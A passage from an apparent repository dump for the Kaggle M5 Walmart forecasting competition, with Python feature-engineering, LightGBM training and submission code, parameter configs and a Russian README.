calculate ratio\n temp['price_mean_ratio_week_to_month'] = (temp['sell_price'] / temp['price_mean_month'])\n\n # price_columns = temp.columns\n # for period in [7, 14, 21, 28]:\n # # adjust week depending on horizon\n # temp.reset_index(inplace=True)\n # temp['wm_yr_wk'] = temp['wm_yr_wk'] + 1\n # temp.set_index(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n # temp.columns = [x + f'_{period}' for x in price_columns]\n\n # dtmp = sales[columns].join(temp, on=columns)\n # dtmp.set_index(columns, inplace=True)\n # dtmp = dtmp.groupby(['store_id', 'item_id']).ffill().groupby(['store_id', 'item_id']).bfill()\n # for column in dtmp.columns:\n # if column not in columns:\n # sales[column] = dtmp[column].values\n # if 'sell_price' in column:\n # sales[column] = sales[column].astype('uint16')\n # elif 'price_mean_month' in column:\n # sales[column] = sales[column].astype('uint16')\n dtmp = sales[columns].join(temp, on=columns)\n dtmp.set_index(columns, inplace=True)\n dtmp = dtmp.groupby(['store_id', 'item_id']).ffill().groupby(['store_id', 'item_id']).bfill()\n for column in dtmp.columns:\n if column not in columns:\n sales[column] = dtmp[column].values\n if 'sell_price' in column:\n sales[column] = sales[column].astype('uint16')\n elif 'price_mean_month' in column:\n sales[column] = sales[column].astype('uint16')\n elif 'price_mean_ratio' in column:\n sales[column] = sales[column].astype('float32')\n pass\n \n add_features_price(sales, prices)\n print('Price features successfully added')\n\n # sales.dropna(inplace=True)\n sales.drop(['id', 'date'], axis=1, inplace=True)\n sales.reset_index(drop=True, inplace=True)\n\n sales['item_id'] = sales['item_id'].astype('uint16')\n sales['store_id'] = sales['store_id'].astype('uint8')\n\n print(\"don't forget to fill missing holidays: matters at evaluation\")\n print(\"don't forget to check which rows get removed\")\n\n save_encoder(encoder)\n return sales\n\n\n\n\n# masterfile adventures\ndef 
read_master(masterfile = 'master.csv'):\n df = pd.read_csv(masterfile, dtype={'model_id':str,'parameters':str})\n return df\n\ndef save_master(df, masterfile = 'master.csv'):\n df.to_csv(masterfile, index=False)\n print('Masterfile was updated')\n\ndef add_model(parameters, masterfile = 'master.csv'):\n '''\n Adds model to master file and gives it unique id\n '''\n if masterfile in os.listdir():\n df = read_master()\n if str(parameters) in list(df['parameters']):\n print(f'Model already included. No changes were made to {masterfile}')\n return False\n else:\n max_index = df['model_id'].astype(int).max()\n new_id = max_index + 1\n df.loc[new_id, 'model_id'] = '0'*(4-len(str(new_id))) + str(new_id)\n df.loc[new_id, 'parameters'] = str(parameters)\n else:\n print(f'Masterfile was not found and will be created at ./{masterfile}')\n df = pd.DataFrame({'model_id' : '0000', 'parameters' : str(parameters)}, index=[0])\n save_master(df)\n return True\n\ndef get_model_id(parameters, masterfile = 'master.csv'):\n '''\n Finds model_id with specified parameters in master file \n '''\n df = read_master()\n return df.loc[df['parameters'] == str(parameters), 'model_id'].values[0]\n\ndef get_model_parameters(model_id, masterfile = 'master.csv'):\n '''\n Returns parameters of the model with specified model_id from the masterfile\n '''\n df = read_master()\n return eval(df.loc[df['model_id'] == str(model_id), 'parameters'].values[0])\n\ndef check_model(model_id, months=[1,2,3], masterfile = 'master.csv'):\n '''\n Checks whether model is evaluated: prediction file exists\n '''\n flag = 0\n for month in months:\n name = f'{model_id}_{month}.csv'\n if name in os.listdir('./forecasts/'):\n print(f'{model_id} is evaluated for month {month}')\n else:\n flag += 1\n print(f'{model_id} is not evaluated for month {month}')\n if flag == 0:\n return True\n else:\n return False\n\ndef evaluate_model(model_id, months=[1, 2, 3]):\n '''\n Trains lgbm model given parameters and outputs model and prediction\n '''\n parameters = get_model_parameters(model_id)\n cat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n cat_feats = cat_feats + ['wday', 'month']\n cat_feats = cat_feats + ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']\n\n # state_ids = ['CA', 'TX', 'WI']\n store_ids = ['CA_1', 'CA_2', 'CA_3', 'CA_4', 'TX_1', 'TX_2', 'TX_3', 'WI_1', 'WI_2', 'WI_3']\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n\n print(f'Models are divided by {by_variable}')\n values = list(encoder.mapping[by_variable].keys())\n print(values)\n\n fcst_horizon = parameters['fcst_horizon']\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n i = 1\n for month in months:\n fcst_date = 1914 - 28 * month\n predictions = []\n for value in values:\n print(f'Step {i} out of {len(values) * len(months)}')\n # 1. 
read abt\n partial_abts = []\n for store_id in store_ids:\n partial_abt = pd.read_pickle(f'./work/abt_{store_id}.pkl')\n features = get_features(partial_abt, fcst_horizon)\n partial_abt = partial_abt[features]\n # apply by_variable filter\n partial_abt = partial_abt[partial_abt[by_variable] == encoder.mapping[by_variable][value]]\n # filter dates\n partial_abt = partial_abt[partial_abt['day'] >= fcst_date - history_length]\n partial_abt = partial_abt[partial_abt['day'] < fcst_date + 28]\n # filter start of every TS\n partial_abt = partial_abt[partial_abt['history_length'] >= history_start]\n\n partial_abts.append(partial_abt)\n abt = pd.concat(partial_abts)\n print('abt is successfully gathered')\n partial_abts = None\n partial_abt = None\n gc.collect()\n # if fcst_horizon == 4:\n # with open(f'./work/abt_{fcst_horizon}_{state_id}.pkl', 'rb') as handle:\n # abt = pickle.load(handle)\n # else:\n # raise ValueError('Forecast horizons other than 4 not implemented yet')\n if 'Unnamed: 0' in abt.columns:\n abt.drop('Unnamed: 0', axis=1, inplace=True)\n # 2. filter according to state_id\n # abt = abt[encoder.decode(abt, 'state_id') == state_id]\n\n for feature in cat_feats:\n abt[feature] = abt[feature].astype('category')\n \n # 3. separate into train and test\n\n if 'use_scaling' in parameters.keys() and parameters['use_scaling'] == 1:\n print(\"Scaling is used because parameter 'use_scaling' was set to 1\")\n # get average sales for every TS over last year\n qty_scaling = abt.loc[abt['day'] == fcst_date + fcst_horizon * 7 - 6, ['item_id', 'store_id', 'qty_mean_lastyear']]\n qty_scaling.rename(columns={'qty_mean_lastyear':'qty_scaling'}, inplace=True)\n qty_scaling.set_index(['item_id', 'store_id'], inplace=True)\n qty_scaling.loc[qty_scaling['qty_scaling'] < 1/364, 'qty_scaling'] = 1\n qty_scaling = abt[['item_id','store_id']].join(qty_scaling, on=['item_id', 'store_id'])\n abt['qty_scaling'] = qty_scaling['qty_scaling']\n qty_scaling = None\n gc.collect()\n for feature in ['qty_mean_lastweek', 'qty_mean_lastmonth', 'qty_mean_lastyear', 'qty_std_lastyear', 'qty']:\n abt[feature] = abt[feature] / abt['qty_scaling']\n else:\n print('Scaling is not used')\n\n y_train = abt.loc[abt['day'] < fcst_date, 'qty']\n X = abt.drop(['qty'], axis=1)\n X_train = X[X['day'] < fcst_date]\n X_test = X[X['day'] >= fcst_date]\n\n # 4. convert to lgbm dataset\n if 'use_weights' in parameters.keys() and parameters['use_weights'] == 1:\n weights = get_weights_for_abt(X_train, fcst_date)\n print('Weighting is used')\n else:\n print('Weighting is not used')\n\n print(f'Train data shape: {X_train.shape}')\n if 'use_weights' in parameters.keys() and parameters['use_weights'] == 1:\n train_data = lgb.Dataset(X_train, label = y_train, weight = weights, categorical_feature=cat_feats, free_raw_data=True)\n else:\n train_data = lgb.Dataset(X_train, label = y_train, categorical_feature=cat_feats, free_raw_data=True)\n # 4. train\n model = lgb.train(parameters['lgbm_params'], train_data)\n # 5. make prediction\n X_test['predict'] = model.predict(X_test)\n if 'use_scaling' in parameters.keys() and parameters['use_scaling'] == 1:\n X_test['predict'] = X_test['predict'] * X_test['qty_scaling']\n cat_columns = ['item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']\n columns = cat_columns + ['day', 'predict']\n prediction = X_test[columns]\n for column in cat_columns:\n prediction.loc[:, column] = encoder.decode(prediction, column)\n\n # 6. 
save model and prediction\n name = f'{model_id}_{month}_{value}'\n model.save_model(\"./work/\" + name + \".lgb\")\n predictions.append(prediction)\n i += 1\n \n predictions = pd.concat(predictions)\n name = f'{model_id}_{month}'\n predictions.to_csv('./forecasts/pred_' + name + '.csv', index=False)\n print('Model evaluation complete')\n pass\n\ndef get_val_fcst(model_id):\n evaluate_model(model_id, months=[0])\n pass\n\ndef prepare_val_submission(model_id):\n df = pd.read_csv(f'./forecasts/pred_{model_id}_0.csv')\n df['id'] = df['item_id'] + '_' + df['store_id'] + '_validation'\n df = df[['id', 'day','predict']]\n df['day'] = df['day'] - 1913\n df['day'] = 'F' + df['day'].astype(str)\n df = df.pivot(index='id', columns='day', values='predict')\n df =df[[f'F{x}' for x in range(1,29)]]\n example = pd.read_csv('./data/sample_submission.csv')\n submission = example[['id']].join(df, on='id').fillna(0)\n submission.to_csv(f'./submissions/{model_id}.csv', index=False)\n pass\n\ndef prepare_val_weights():\n weights = pd.read_csv('./data/weights_validation.csv')\n weights = weights[weights['Level_id']=='Level12'].rename(columns={'Agg_Level_1':'item_id', 'Agg_Level_2':'store_id','Weight':'weight'})[['item_id','store_id','weight']]\n weights.to_csv('./work/validation_weights.csv', index=False)\n\ndef get_weights_for_abt(abt, fcst_date):\n history = load_history(fcst_date)\n denominator = get_rmsse_denominator(history, fcst_date)\n history['denominator'] = denominator\n history = history[['item_id','store_id','denominator']]\n history.set_index(['item_id','store_id'], inplace=True)\n\n weights = pd.read_csv('./work/validation_weights.csv')\n weights = weights.join(history, on=['item_id','store_id'])\n\n mask = (weights['weight'] != 0)\n weights['weight2'] = 0\n weights.loc[mask, 'weight2'] = weights.loc[mask, 'weight'] / np.sqrt(weights.loc[mask, 'denominator'])\n\n encoder = load_encoder()\n # encode to join with abt\n for column in ['store_id','item_id']:\n weights[column] = encoder.encode(weights, column)\n # add weight to abt\n weights.set_index(['store_id','item_id'], inplace=True)\n weights = weights[['weight2']]\n weights = weights * len(weights) / weights.sum() # rescale weights\n weights = abt[['store_id','item_id']].join(weights,on=['store_id','item_id'])\n return np.array(weights['weight2'])\n\n# error calculation\ndef get_rmsse_denominator(history, fcst_date):\n # denominator in error calculation\n # calculate squared differences fron n=1 to fcst_date\n tmp = np.array(history[range(1, fcst_date)])\n tmp = tmp[:, 1:] - tmp[:, : -1]\n tmp = tmp ** 2\n # create mask matrix\n mask = np.array(history[range(1, fcst_date)])\n mask = np.cumsum(mask, axis=1)\n mask = (mask > 0)\n # multiply by mask = {0,1}\n tmp = tmp * mask[:, 1:]\n # sum\n tmp = tmp.sum(axis=1)\n # divide by coefficient\n first_sale = (mask == 0).sum(axis=1)\n tmp = tmp / (fcst_date - 1 - 1 - first_sale)\n return tmp\n\ndef load_history(fcst_date):\n history = read_train()\n cols_cat = [x for x in history.columns if not x.startswith('d_')]\n cols_qty = [int(x[2:]) for x in history.columns if x.startswith('d_')]\n history.columns = cols_cat + cols_qty\n cols_qty = [x for x in cols_qty if x < fcst_date + 28]\n history = history[cols_cat + cols_qty]\n history.set_index('id', inplace=True)\n return history\n\ndef get_features(abt, fcst_horizon=4):\n columns_all = ['qty', 'item_id','dept_id','cat_id','store_id','state_id','day','week','year','wm_yr_wk','month','wday']\n columns_all += ['history_length', 'dayofyear','snap']\n 
columns_all += ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']\n columns_all += ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']\n columns_all += ['price_mean_month', 'sell_price', 'price_mean_ratio_week_to_month']\n\n # лаги все что можно\n columns_lag = [x for x in abt.columns if x.startswith('lag') and int(x.split('_')[-1]) >= fcst_horizon * 7]\n\n # qty_sum_7 все что можно\n columns_qty = [x for x in abt.columns if x.startswith('qty') and x !='qty']\n columns_qty = [x for x in columns_qty if (int(x.split('_')[-1]) == fcst_horizon * 7) or (int(x.split('_')[-1]) > fcst_horizon * 7 and x.startswith('qty_sum_7'))]\n\n # abt.drop(columns_all, axis=1).info()\n columns_keep = columns_all + columns_lag + columns_qty\n return columns_keep\n\ndef load_summary():\n summary = pd.read_pickle('./work/summary.pkl')\n return summary\n\nif __name__ == \"__main__\":\n pass\n" }, { "alpha_fraction": 0.4600583016872406, "alphanum_fraction": 0.4991253614425659, "avg_line_length": 25.589147567749023, "blob_id": "10a491ac1bfed8e3cc4bb28b0ccb4b34721172fd", "content_id": "916c846d2835a88e9606725dc3ac83c643d3592b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3430, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/step_recursive.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom utils_recursive import *\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7', 'id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 'num_iterations' : 300,\n# 'num_leaves': 16,\n# \"min_data_in_leaf\": 100,\n# 'seed': 0,\n# 'n_jobs': -1\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7', 'id', 'cat_id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 'num_iterations' : 600,\n# 'num_leaves': 63,\n# \"min_data_in_leaf\": 500,\n# 'seed': 0,\n# 'n_jobs': -1\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\n\n# parameters = {\n# 'fcst_horizon' : None,\n# 'history_length' : 730,\n# 'history_start' : 35,\n# 'recursive' : True,\n# 'by_variable' : 'cat_id',\n# 'remove_features' : ['lag1', 'lag7','lag14','year','first_sale_day', 'id', 'cat_id'],\n# 'lgbm_params':{\n# \"objective\" : \"poisson\",\n# \"metric\" :\"rmse\",\n# \"force_row_wise\" : True,\n# \"learning_rate\" : 0.05,\n# \"sub_feature\" : 0.5,\n# \"sub_row\" : 0.75,\n# \"bagging_freq\" : 1,\n# \"lambda_l2\" : 0.1,\n# 'verbosity': 1,\n# 
'num_iterations' : 600,\n# 'num_leaves': 2**8 - 1,\n# \"min_data_in_leaf\": 500,\n# 'seed': 0,\n# 'n_jobs': 2\n# }\n# }\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\n# train_model_recursive(model_id, months=[0])\n# predict_and_prepare_submit_recursive(model_id, month=0)\n\n\nparameters = {\n 'fcst_horizon' : None,\n 'history_length' : 730,\n 'history_start' : 35,\n 'recursive' : True,\n 'by_variable' : 'cat_id',\n 'remove_features' : ['year','first_sale_day', 'id', 'cat_id'],\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.05,\n \"sub_feature\" : 0.5,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n 'verbosity': 1,\n 'num_iterations' : 600,\n 'num_leaves': 2**9 - 1,\n \"min_data_in_leaf\": 500,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\n\n# add_model(parameters)\n# model_id = get_model_id(parameters)\nmodel_id = \"0029\"\ntrain_model_recursive(model_id, months=[-1])\npredict_and_prepare_submit_recursive(model_id, month=-1)\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7895545363426208, "avg_line_length": 53.25, "blob_id": "146ec28f1066da1ec5b117d0afc36c3b7e69da05", "content_id": "33aeeecbb28c7753bdcbc7f55308587b2520e01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 195, "num_lines": 24, "path": "/README.md", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "# m5-forecasting-accuracy\n\n[Соревнование на Kaggle по прогнозированию продаж WALMART](https://www.kaggle.com/c/m5-forecasting-accuracy/overview)\n\n## Содержание репозитория:\n\n*fcst_weekly.ipynb* - понедельный прогноз.\n\n*disagg_coefs.ipynb* - дизагрегация понедельного прогноза до подневного: для каждого месяца считалась доля понедельников, вторников и тд в суммарных продажах.\nЗаброшена из-за сложного распределения продаж между днями недели, в том числе плохо учитывались snap дни.\n\n*fcst_daily.ipynb* - подневный прогноз.\n\nЗатем было решено организовать работу следующим образом:\n1) Функции для создание витрины с фичами находятся в *utils.py*\n2) Запуск обучения модели происходит в скрипте *step.py*, где parameters - конфиг (dict) с lgbm-параметрами, разрезом (по штатам и/или департаментам и тп) и др.\n * add_model(parameters)\n * model_id = get_model_id(parameters)\n * evaluate_model(model_id)\n * get_val_fcst(model_id)\n * prepare_val_submission(model_id)\n3) Информация об использованных моделях хранится в *master.csv*, где планировалось также хранить ошибку прогноза за различные периоды\n\nТакже был использован рекурсивный подход к прогнозированию (который показал более высокую точность в публичном рейтинге) с аналогичной структурой: файлы *step_recursive.py* и *utils_recursive.py*\n" }, { "alpha_fraction": 0.5890864729881287, "alphanum_fraction": 0.6110596656799316, "avg_line_length": 43.912471771240234, "blob_id": "2c7932dfe4bd00637342eaee8915faa8d9eb0a8a", "content_id": "d7f76ac04ab2f58e21fab955dfe9a5ec0edbc88e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20843, "license_type": "no_license", "max_line_length": 164, "num_lines": 457, "path": "/utils_recursive.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom tqdm import tqdm\n\ndef load_prices_pivot(fcst_date=None, history_length=730, value_filter={}):\n start_day = 
fcst_date - history_length - 364\n ### prepare calendar data to join with prices\n cal = read_calendar()\n cal['day'] = cal['d'].apply(lambda x: int(x[2:])).astype('uint16')\n cal.drop('d', axis=1,inplace=True)\n # filter\n cal = cal[['wm_yr_wk', 'day']].set_index('day')\n cal = cal.loc[start_day:, :]\n cal.reset_index(inplace=True)\n cal.set_index('wm_yr_wk', inplace=True)\n \n ### load summary to apply filter\n encoder = load_encoder()\n summary = load_summary()\n if value_filter:\n for key, values in value_filter.items():\n if type(values) != list:\n values = [values]\n summary = summary[summary[key].isin(values)]\n ids = encoder.encode(summary, 'id') # list of filtered ids\n summary = None\n \n ### prices\n prices = read_prices()\n # add id, remove item and store\n prices['id'] = prices['item_id'] + '_' + prices['store_id'] + '_validation'\n prices.drop(['item_id', 'store_id'],axis=1,inplace=True)\n # encode and filter id\n prices['id'] = encoder.encode(prices, 'id')\n prices = prices[prices['id'].isin(ids)]\n # join with cal\n prices = prices.join(cal, on='wm_yr_wk')\n prices.dropna(subset=['day'], inplace=True)\n # change 'day' and 'sell_price' to int, remove week number\n prices['sell_price'] = prices['sell_price'].astype('uint16')\n prices['day'] = prices['day'].astype('uint16')\n prices.drop('wm_yr_wk', axis=1, inplace=True)\n # transform table from long to wide\n prices = prices.pivot(index='id', columns='day',values='sell_price')\n # deal with missing prices\n prices = prices.ffill(axis=1).bfill(axis=1)\n prices = prices.loc[:, : fcst_date + 27]\n return prices\n\n\ndef create_price_features(prices, fcst_date=1914, history_length=730):\n ### создание фичей\n # 1. средняя цена за неделю (шифт 1)\n price_mean_7 = prices.rolling(7, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 2. средняя цена за месяц (шифт 1)\n price_mean_28 = prices.rolling(28, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 3. 
относительная волатильность цены за год\n price_rstd_364 = (prices.rolling(364, axis=1).std().shift(1, axis=1) / prices.rolling(364, axis=1).mean().shift(1, axis=1)).loc[:, fcst_date - history_length :]\n \n ### сбор фичей\n prices = prices.loc[:, fcst_date - history_length :]\n columns = list(prices.columns)\n\n prices.reset_index(inplace=True)\n prices = pd.melt(prices, id_vars=['id'], value_vars=columns, value_name='sell_price')\n\n dfs = [price_mean_7, price_mean_28, price_rstd_364]\n cols = ['price_mean_7', 'price_mean_28', 'price_rstd_364']\n for df, column in zip(dfs, cols):\n df.reset_index(inplace=True)\n df = pd.melt(df, id_vars=['id'], value_vars=columns, value_name=column)\n df.set_index(['id', 'day'], inplace=True)\n df = prices[['id', 'day']].join(df, on= ['id', 'day'])\n prices[column] = df[column].values\n prices[column] = prices[column].astype('float32')\n df = None\n \n for column in ['id' ,'day','sell_price']:\n prices[column] = prices[column].astype('uint16')\n \n prices['price_ratio_sellprice_to_mean7'] = (prices['sell_price'] / prices['price_mean_7']).astype('float32')\n prices['price_ratio_sellprice_to_mean28'] = (prices['sell_price'] / prices['price_mean_28']).astype('float32')\n prices['price_ratio_mean7_to_mean28'] = (prices['price_mean_7'] / prices['price_mean_28']).astype('float32')\n return prices\n\n\ndef create_features_in_batches(df, function, fcst_date=None, history_length=730, n_batches=20):\n batchsize = int((df.shape[0] + 1)/ n_batches) + 1\n features = []\n for i in tqdm(range(n_batches)):\n batch = df.iloc[batchsize * i : batchsize * (i + 1)]\n features.append(function(batch, fcst_date=fcst_date, history_length=history_length))\n features = pd.concat(features)\n features.reset_index(drop=True, inplace=True)\n return features\n\n\ndef load_sales_pivot(fcst_date=None, history_length=730, value_filter={}):\n # load data\n sales = read_train()\n # apply value_filter\n if value_filter:\n for key, values in value_filter.items():\n if type(values) != list:\n values = [values]\n sales = sales[sales[key].isin(values)]\n # drop categorical columns\n sales.drop(['item_id', 'store_id', 'dept_id', 'cat_id', 'state_id'],axis=1,inplace=True)\n # encode id\n encoder = load_encoder()\n sales['id'] = encoder.encode(sales, 'id')\n sales.set_index('id', inplace=True)\n # add fcst days\n for day in range(fcst_date, fcst_date + 28):\n sales[f'd_{day}'] = 0\n sales[f'd_{day}'] = sales[f'd_{day}'].astype('uint16')\n # convert days from str to int and filter\n sales.columns = [int(x[2:]) for x in sales.columns]\n start_day = fcst_date - history_length - 364\n sales = sales.loc[:, start_day:]\n sales.sort_index(inplace=True)\n return sales\n\ndef create_sales_features(sales, fcst_date=None, history_length=730):\n ### создание фичей\n # 0. day of the first sale\n first_sale = ((sales.loc[:, 1:].copy().cumsum(axis=1) == 0).sum(axis=1) + 1).astype('uint16')\n first_sale = pd.DataFrame(first_sale).reset_index().rename(columns={'index':'id', 0:'first_sale_day'}).set_index('id')\n # 1. средние продажи за неделю (шифт 1)\n sales_mean_7 = sales.rolling(7, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 2. средние продажи за месяц (шифт 1)\n sales_mean_28 = sales.rolling(28, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 3. средние продажи за год (шифт 1)\n sales_mean_364 = sales.rolling(364, axis=1).mean().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 4. 
относительная волатильность продаж за месяц\n sales_rstd_28 = sales.rolling(28, axis=1).std().shift(1, axis=1).loc[:, fcst_date - history_length :]\n sales_rstd_28 = sales_rstd_28 / sales_mean_28\n sales_rstd_28[sales_rstd_28 == np.inf] = 0\n # 5. относительная волатильность продаж за год\n sales_rstd_364 = sales.rolling(364, axis=1).std().shift(1, axis=1).loc[:, fcst_date - history_length :]\n sales_rstd_364 = sales_rstd_364 / sales_mean_364\n sales_rstd_364[sales_rstd_364 == np.inf] = 0\n # 6. медианные продажи за месяц\n sales_median_28 = sales.rolling(28, axis=1).median().shift(1, axis=1).loc[:, fcst_date - history_length :]\n # 7. медианные продажи за год\n sales_median_364 = sales.rolling(364, axis=1).median().shift(1, axis=1).loc[:, fcst_date - history_length :]\n \n # lags\n lags = [1, 6, 7, 13, 14, 20, 21, 28, 42, 49, 64, 65, 364, 365]\n cols_lags = ['lag' + str(x) for x in lags]\n lag_dfs = []\n for lag in lags:\n lag_dfs.append(sales.shift(lag, axis=1).loc[:, fcst_date - history_length :])\n\n ### сбор фичей\n sales = sales.loc[:, fcst_date - history_length :]\n columns = list(sales.columns)\n\n sales.reset_index(inplace=True)\n sales = pd.melt(sales, id_vars=['id'], value_vars=columns, var_name='day', value_name='sales')\n \n # add first sale day\n sales = sales.join(first_sale, on='id')\n \n # add sales features\n dfs = [sales_mean_7, sales_mean_28, sales_mean_364, sales_rstd_28, sales_rstd_364, sales_median_28, sales_median_364]\n dfs = dfs + lag_dfs\n cols = ['sales_mean_7', 'sales_mean_28', 'sales_mean_364', 'sales_rstd_28', 'sales_rstd_364', 'sales_median_28', 'sales_median_364']\n cols = cols + cols_lags\n for df, column in zip(dfs, cols):\n df.reset_index(inplace=True)\n df = pd.melt(df, id_vars=['id'], value_vars=columns, var_name='day',value_name=column)\n df.set_index(['id', 'day'], inplace=True)\n df = sales[['id', 'day']].join(df, on= ['id', 'day'])\n sales[column] = df[column].values\n if column.startswith('lag'):\n # sales[column] = sales[column].astype('uint16')\n sales[column] = sales[column].astype('float32')\n else:\n sales[column] = sales[column].astype('float32')\n df = None\n \n for column in ['id' ,'day','sales']:\n sales[column] = sales[column].astype('uint16')\n \n sales['sales_ratio_mean7_to_mean28'] = (sales['sales_mean_7'] / sales['sales_mean_28']).astype('float32')\n sales['sales_ratio_mean7_to_mean364'] = (sales['sales_mean_7'] / sales['sales_mean_364']).astype('float32')\n sales['sales_ratio_mean28_to_mean364'] = (sales['sales_mean_28'] / sales['sales_mean_364']).astype('float32')\n \n sales.fillna(0, inplace=True)\n # add history length\n sales['history_length'] = (sales['day'] - sales['first_sale_day']).astype('uint16')\n return sales\n\n\ndef create_features_events():\n calendar = read_calendar()\n calendar['dayofyear'] = (calendar['date'].dt.dayofyear).astype('uint16')\n calendar['day'] = calendar['d'].apply(lambda x: int(x[2:]))\n \n # divide events into separate columns by type\n for event_type in calendar['event_type_1'].dropna().unique():\n event_name_bytype = []\n for _, row in calendar.iterrows():\n if row['event_type_1'] == event_type:\n event_name_bytype.append(row['event_name_1'])\n elif row['event_type_2'] == event_type:\n event_name_bytype.append(row['event_name_2'])\n else:\n event_name_bytype.append(np.nan)\n event_type = event_type.lower()\n calendar[f'event_name_{event_type}'] = event_name_bytype\n\n calendar.drop(['event_name_1', 'event_name_2', 'event_type_1', 'event_type_2'], axis=1, inplace=True)\n 
calendar.fillna(method='backfill', inplace=True)\n\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n tmp = calendar[['year', column, 'day']].groupby(['year', column]).max().rename(columns={'day':'maxday'})\n dtmp = calendar[['year', column]].join(tmp, on=['year', column])\n calendar['maxday'] = dtmp['maxday'].values\n calendar[\"days_till_next_{}\".format(column.split('_')[2])] = calendar['maxday'] - calendar['day']\n calendar.drop('maxday', axis=1, inplace=True)\n\n calendar['event_name_religious'].fillna('Eid al-Fitr', inplace=True)\n feature = 'days_till_next_religious'\n days = calendar[calendar[feature].isna()].index\n calendar.loc[days, feature] = calendar.loc[days, 'date'].apply(lambda x: (pd.to_datetime('2016-07-07') - x).days)\n \n for feature in ['event_name_national', 'days_till_next_national']:\n days = calendar.loc[calendar[feature].isna(), 'day'].values\n days = [x - 365 for x in days]\n calendar.loc[calendar[feature].isna(), feature] = calendar.loc[calendar['day'].isin(days), feature].values\n \n encoder = load_encoder()\n \n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n calendar[column] = encoder.encode(calendar, column)\n calendar[column] = calendar[column].astype('uint8')\n for column in ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']:\n calendar[column] = calendar[column].astype('uint16')\n for column in ['wday', 'month', 'snap_CA', 'snap_TX', 'snap_WI']:\n calendar[column] = calendar[column].astype('uint8')\n for column in ['year', 'day']:\n calendar[column] = calendar[column].astype('uint16')\n \n calendar.drop(['date', 'd', 'wm_yr_wk', 'weekday'], axis=1, inplace=True)\n return calendar\n\n\ndef create_abt_recursive(fcst_date=None, value_filter={'cat_id' : 'FOODS'}, history_length=730, n_batches=20):\n print('Preparing price features...')\n prices = load_prices_pivot(fcst_date, history_length, value_filter)\n price_features = create_features_in_batches(prices, create_price_features, fcst_date, history_length, n_batches)\n\n print('Preparing sales features...')\n sales = load_sales_pivot(fcst_date=fcst_date, value_filter=value_filter)\n sales_features = create_features_in_batches(sales, create_sales_features, fcst_date, history_length, n_batches)\n\n print('Preparing event features...')\n event_features = create_features_events()\n print('Done')\n \n print('Preparing categorical features...')\n summary = load_summary()\n encoder = load_encoder()\n for col in summary.columns:\n summary[col] = encoder.encode(summary, col)\n print('Done')\n\n print('Combining features into abt ...')\n price_features = price_features.join(sales_features.set_index(['id', 'day']), on = ['id', 'day'])\n price_features = price_features.join(event_features.set_index('day'), on='day')\n price_features = price_features.join(summary.set_index('id'), on='id')\n # dropping useless features\n # price_features.drop(['id'], axis=1, inplace=True)\n print('Done')\n return price_features\n\n\ndef train_model_recursive(model_id, months=[0]):\n '''\n Trains lgbm model given parameters and outputs model and prediction\n '''\n parameters = get_model_parameters(model_id)\n if parameters['recursive'] != True:\n return False\n cat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n cat_feats = cat_feats + ['wday', 'month']\n cat_feats = cat_feats + 